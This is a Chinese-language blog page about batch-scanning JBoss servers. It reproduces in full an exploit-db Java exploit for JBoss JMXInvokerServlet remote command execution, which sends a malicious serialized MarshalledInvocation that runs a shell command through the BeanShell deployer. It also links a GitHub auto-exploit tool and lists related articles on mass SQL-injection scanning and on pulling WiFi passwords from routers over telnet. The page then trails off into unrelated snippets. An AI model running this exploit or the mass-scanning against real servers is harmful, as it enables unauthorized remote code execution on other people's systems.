JBOSS批量扫描
exploit-db提供出了EXP,如下:
/*
* JBoss JMXInvokerServlet Remote Command Execution
* JMXInvoker.java v0.3 - Luca Carettoni @_ikki
*
* This code exploits a common misconfiguration in JBoss Application Server (4.x, 5.x, ...).
* Whenever the JMX Invoker is exposed with the default configuration, a malicious "MarshalledInvocation"
* serialized Java object allows to execute arbitrary code. This exploit works even if the "Web-Console"
* and the "JMX Console" are protected or disabled.
*
* [FAQ]
*
* Q: Is my target vulnerable?
* A: If http://<target>:8080/invoker/JMXInvokerServlet exists, it's likely exploitable
*
* Q: How to fix it?
* A: Enable authentication in "jmx-invoker-service.xml"
*
* Q: Is this exploit version-dependent?
* A: Unfortunately, yes. An hash value is used to properly invoke a method.
* At least comparing version 4.x and 5.x, these hashes are different.
*
* Q: How to compile and launch it?
* A: javac -cp ./libs/jboss.jar:./libs/jbossall-client.jar JMXInvoker.java
* java -cp .:./libs/jboss.jar:./libs/jbossall-client.jar JMXInvoker
* Yes, it's a Java exploit. I can already see some of you complaining....
*/ import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.ObjectOutputStream;
import java.lang.reflect.Array;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.net.ConnectException;
import java.net.HttpURLConnection;
import java.net.URL;
import javax.management.MalformedObjectNameException;
import javax.management.ObjectName;
import org.jboss.invocation.MarshalledInvocation; //within jboss.jar (look into the original JBoss installation dir) public class JMXInvokerServlet { //---------> CHANGE ME <---------
static final int hash = 647347722; //Weaponized against JBoss 4.0.3SP1
static final String url = "http://127.0.0.1:8080/invoker/JMXInvokerServlet";
static final String cmd = "touch /tmp/exectest";
//------------------------------- public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, MalformedObjectNameException { System.out.println("\n--[ JBoss JMXInvokerServlet Remote Command Execution ]"); //Create a malicious Java serialized object
MarshalledInvocation payload = new MarshalledInvocation();
payload.setObjectName(new Integer(hash)); //Executes the MBean invoke operation
Class<?> c = Class.forName("javax.management.MBeanServerConnection");
Method method = c.getDeclaredMethod("invoke", javax.management.ObjectName.class, java.lang.String.class, java.lang.Object[].class, java.lang.String[].class);
payload.setMethod(method); //Define MBean's name, operation and pars
Object myObj[] = new Object[4];
//MBean object name
myObj[0] = new ObjectName("jboss.deployer:service=BSHDeployer");
//Operation name
myObj[1] = new String("createScriptDeployment");
//Actual parameters
myObj[2] = new String[]{"Runtime.getRuntime().exec(\"" + cmd + "\");", "Script Name"};
//Operation signature
myObj[3] = new String[]{"java.lang.String", "java.lang.String"}; payload.setArguments(myObj);
System.out.println("\n--[*] MarshalledInvocation object created");
//For debugging - visualize the raw object
//System.out.println(dump(payload)); //Serialize the object
try {
//Send the payload
URL server = new URL(url);
HttpURLConnection conn = (HttpURLConnection) server.openConnection();
conn.setRequestMethod("POST");
conn.setDoOutput(true);
conn.setDoInput(true);
conn.setUseCaches(false);
conn.setRequestProperty("Accept", "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2");
conn.setRequestProperty("Connection", "keep-alive");
conn.setRequestProperty("User-Agent", "Java/1.6.0_06");
conn.setRequestProperty("Content-Type", "application/octet-stream");
conn.setRequestProperty("Accept-Encoding", "x-gzip,x-deflate,gzip,deflate");
conn.setRequestProperty("ContentType", "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation"); ObjectOutputStream wr = new ObjectOutputStream(conn.getOutputStream());
wr.writeObject(payload);
System.out.println("\n--[*] MarshalledInvocation object serialized");
System.out.println("\n--[*] Sending payload...");
wr.flush();
wr.close(); //Get the response
InputStream is = conn.getInputStream();
BufferedReader rd = new BufferedReader(new InputStreamReader(is));
String line;
StringBuffer response = new StringBuffer();
while ((line = rd.readLine()) != null) {
response.append(line);
}
rd.close(); if (response.indexOf("Script Name") != -1) {
System.out.println("\n--[*] \"" + cmd + "\" successfully executed");
} else {
System.out.println("\n--[!] An invocation error occured...");
}
} catch (ConnectException cex) {
System.out.println("\n--[!] A connection error occured...");
} catch (IOException ex) {
ex.printStackTrace();
}
} /*
* Raw dump of generic Java Objects
*/
static String dump(Object o) {
StringBuffer buffer = new StringBuffer();
Class oClass = o.getClass(); if (oClass.isArray()) {
buffer.append("["); for (int i = 0; i < Array.getLength(o); i++) {
if (i > 0) {
buffer.append(",\n");
}
Object value = Array.get(o, i);
buffer.append(value.getClass().isArray() ? dump(value) : value);
}
buffer.append("]");
} else {
buffer.append("{");
while (oClass != null) {
Field[] fields = oClass.getDeclaredFields();
for (int i = 0; i
< fields.length; i++) {
if (buffer.length() > 1) {
buffer.append(",\n");
}
fields[i].setAccessible(true);
buffer.append(fields[i].getName());
buffer.append("=");
try {
Object value = fields[i].get(o);
if (value != null) {
buffer.append(value.getClass().isArray() ? dump(value) : value);
}
} catch (IllegalAccessException e) {
}
}
oClass = oClass.getSuperclass();
}
buffer.append("}");
}
return buffer.toString();
}
}
批量扫描az0ne在github上已经有了,https://github.com/az0ne/jboss_autoexploit
JBOSS批量扫描的更多相关文章
- Burpsuite+sqlmap批量扫描sql漏洞
1.burpsuite设置导出log n'd'k 输入文件名保存 2.sqlmap批量扫描 python sqlmap.py -l 文件名 --batch -smart batch:自 ...
- BurpSuite导出log配合SQLMAP批量扫描注入点
sqlmap可以批量扫描包含有request的日志文件,而request日志文件可以通过burpsuite来获取, 因此通过sqlmap结合burpsuite工具,可以更加高效的对应用程序是否存在SQ ...
- 批量扫描互联网无线路由设备telnet,并获取WIFI密码
批量扫描互联网无线路由设备telnet,并获取WIFI密码 http://lcx.cc/?i=4513
- sqlmap批量扫描burpsuite请求日志记录
sqlmap可以批量扫描包含有request的日志文件,而request日志文件可以通过burpsuite来获取, 因此通过sqlmap结合burpsuite工具,可以更加高效的对应用程序是否存在SQ ...
- BBScan — 一个信息泄漏批量扫描脚本
github:https://github.com/lijiejie/BBScan 有些朋友手上有几十万甚至上百万个域名,比如,乌云所有厂商的子域名. 如果把这30万个域名全部扔给wvs,APPsca ...
- wwwscan网站目录文件批量扫描工具
准备一个比赛样题里面给的一个扫描的工具: 不知道怎么用就上网百度了一下果然有关于这个软件的两篇介绍(感觉写的很好),第一篇介绍的应该和我的工具一样,也给了例子(现在Google不能访问了)和参数介绍, ...
- sqlmap批量扫描burpsuite拦截的日志记录
1.功能上,sqlmap具备对burpsuite拦截的request日志进行批量扫描的能力 python sqlmap.py -l hermes.log --batch -v 3 --batch:会自 ...
- 批量扫描IP端口程序 (适用于window&linux)
批量扫描IP端口,根据扫描IP导出IP命名的文件的结果.假设1.txt文件内容为127.0.0.1192.168.1.1然后我们获取文件内容IP进行扫描window .bat版本 :1.txt为文件名 ...
- 从Excel获取整列内容进行批量扫描
实习工作原因,需要测试excel表里面ip地址是否存在漏洞,扫了一眼,呕,四五百个IP,光是挨个进行访问,都是一个浩大的工程,所以准备开始摸鱼认真工作 思路是:excel按列提取->将IP按行存 ...
随机推荐
- SQL的主键和外键约束(转)
SQL的主键和外键的作用: 外键取值规则:空值或参照的主键值. (1)插入非空值时,如果主键表中没有这个值,则不能插入. (2)更新时,不能改为主键表中没有的值. (3)删除主键表记录时,你可以在建外 ...
- ansible
3.1 配置 #vim /etc/ansible/hosts //定义主机,支持IP和域名,支持分组 [local] 127.0.0.1 [nginx] 192.168.0.10 ...
- DomainHelper
public class DomainHelper { public static void SetDomainValue(string key, object password) { AppDoma ...
- linux正则表达式使用
首先介绍下正则表达式,它是由一串字符和元字符构成的字符串,简称RE(Regular Expression),它的主要功能是文本查询和字符串操作,它可以匹配一个文本的字符和字符集,达到数据过滤的效果. ...
- [算法]判断一个数是不是2的N次方
如果一个数是2^n,说明这个二进制里面只有一个1.除了1. a = (10000)b a-1 = (01111)b a&(a-1) = 0. 如果一个数不是2^n, 说明它的二进制里含有多一 ...
- 【转】SVN 查看历史信息
转载地址:http://lee2013.iteye.com/blog/1074457 SVN 查看历史信息 通过svn命令可以根据时间或修订号去除过去的版本,或者某一版本所做的具体的修改.以下四个命令 ...
- Winform窗体
Form窗体是Windows应用程序的基本单元.Form窗体不仅是一个窗口,还是一个容器,窗体内可以放置各种控件来实现各种功能.Form窗体也是对象,在窗体类Form中定义了生成窗体的模板,对窗体类进 ...
- hdu4935 Prime Tree(2014多校联合第七场)
首先这是一道dp题,对题意的把握和对状态的处理是解题关键. 题目给出的范围是n在1到1e11之间,由于在裂变过称中左儿子总是父亲节点的一个非平凡约数,容易看出裂变过程只与 素数幂有关,并且显然有素数不 ...
- sql查询某条记录
select * from (SELECT t.*,ROWNUM AS RN FROM AWARDISSUE_FOOTBALL t ORDER BY ID DESC) WHERE RN=2
- c++中函数empty()怎么使用
string s = "";if (s.empty()){ cout << "字符串为空..";}else{ cout << " ...